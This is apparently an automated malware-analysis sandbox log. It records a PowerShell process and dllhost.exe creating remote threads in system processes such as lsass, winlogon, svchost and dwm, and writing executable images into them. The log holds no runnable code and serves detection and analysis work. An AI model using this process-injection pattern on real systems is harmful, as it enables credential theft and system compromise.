Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: D10000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4B922EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: F1CA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F1632EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6A1A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9B2D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 841B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7DEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 92FE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 93102EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: C05B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFD52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F18C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F1912EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 7EAE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8752EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D8B32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3052EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B212EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B212EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19FF1630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 263841B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
